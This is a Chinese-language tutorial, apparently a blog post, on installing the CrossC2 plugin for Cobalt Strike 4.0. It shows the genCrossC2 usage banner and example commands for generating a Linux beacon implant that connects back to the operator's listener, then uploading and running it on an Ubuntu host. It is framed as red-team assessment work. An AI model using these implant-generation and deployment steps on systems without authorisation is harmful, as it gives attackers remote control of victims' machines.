环境介绍
-
客户端系统:MacOS BigSur
-
服务端系统:MacOS BigSur
-
软件版本:CobaltStrike4.0
-
插件版本:CrossC2-cs4.0
-
被上线主机系统:Ubuntu20.04
插件介绍
面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/…)的安全评估,支持自定义模块,及包含一些常用的渗透模块。
▄████▄ ██▀███ ▒█████ ██████ ██████ ▄████▄ ██████▄
▒██▀ ▀█ ▓██ ▒ ██▒▒██▒ ██▒▒██ ▒ ▒██ ▒ ▒██▀ ▀█ ██░
▒▓█ ▄ ▓██ ░▄█ ▒▒██░ ██▒░ ▓██▄ ░ ▓██▄ ▒▓█ █████▒
▒▓▓▄ ▄██▒▒██▀▀█▄ ▒██ ██░ ▒ ██▒ ▒ ██▒ ▒▓▓▄ ▄█ ░▒██
▒ ▓███▀ ░░██▓ ▒██▒░ ████▓▒░▒██████▒▒▒██████▒▒ ▒ ▓███▀ ░▒▓█████▓
░ ░▒ ▒ ░░ ▒▓ ░▒▓░░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░ ░ ░▒ ▒ ░▒ ░▓ ░░
░ ▒ ░▒ ░ ▒░ ░ ▒ ▒░ ░ ░▒ ░ ░░ ░▒ ░ ░ ░ ▒ ░ ░░ ░
░ ░░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ CrossC2 v2.0 @hook
░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
[usage]: genCrossC2 [host] [port] [beaconKey_file] [rebind_dynamic_lib] [platform] [arch] [outputFileName] <stagerType>
-host 1.1.1.1 (cs https_listener host)
-port 4444 (cs https_listener port)
-beaconKey_file specify `.cobaltstrike.beacon_keys` file, read from current directory by default
-rebind_dynamic_lib select a dynamic library that requires communication protocol rebinding
-platform 'MacOS' / 'Linux' / 'MacOS-bind' / 'Linux-bind'
-arch 'x86' / 'x64'
-stagerType (optional) 'shellcode' / 'stager'
[ex]:
default config:
./genCrossC2 127.0.0.1 4444 null null MacOS x64 ./CrossC2-test
specify `.cobaltstrike.beacon_keys` file:
./genCrossC2 127.0.0.1 4444 /tmp/cs_server/.cobaltstrike.beacon_keys null MacOS x64 ./CrossC2-test
custom communication protocol:
./genCrossC2 127.0.0.1 4444 /tmp/cs_server/.cobaltstrike.beacon_keys ./cc2_rebind_udp_protocol.so MacOS x64 ./CrossC2-test
CrossC2 安装
首先去Github上下载CrossC2,注意一定要下载4.0专用版
链接放在这里了:
https://github.com/gloxec/CrossC2/tree/cs4.0
本人用的是MacOS系统,所以把客户端和服务端放在了一台设备上,如果说用的是windows系统,可以考虑用虚拟机开kali。
先打开CobaltStrike
打开CobaltStrike后,很多教程上来就让把服务端上的.cobaltstrike.beacon_keys文件放在客户端上,相信很多师傅总是找不到,其实这个文件是需要创建过监听器才会产生,所以要先创建监听器再复制文件,创建的监听器如下设置(监听器端口随意设置,能用即可),注意监听器一定要创建https的否则无法使用
创建好监听器后将会在服务器端文件目录下生成.cobaltstrike.beacon_keys文件,将其复制到客户端文件目录下,将CrossC2项目src目录下的文件复制到客户端目录下
在客户端目录下打开终端,使用如下命令
./genCrossC2.MacOS(Linux系统使用.Linux,windows系统使用.Win.exe具体根据客户端系统进行修改) xxxxxx(cs服务器的ip) xxx(监听器端口) ./.cobaltstrike.beacon_keys null Linux x64 ./CrossC2-test
在客户端目录下即可生成一个名为CrossC2-test的CS马
生成木马,传到服务器上,赋予执行权限
chmod +x CrossC2-test
运行木马
上线成功,目前来看唯一的问题,在于不太稳定,且所能做的相比于windows系统的太少,可能本人才疏学浅,还没研究出来,希望各位大佬能给出一些建议,在此感谢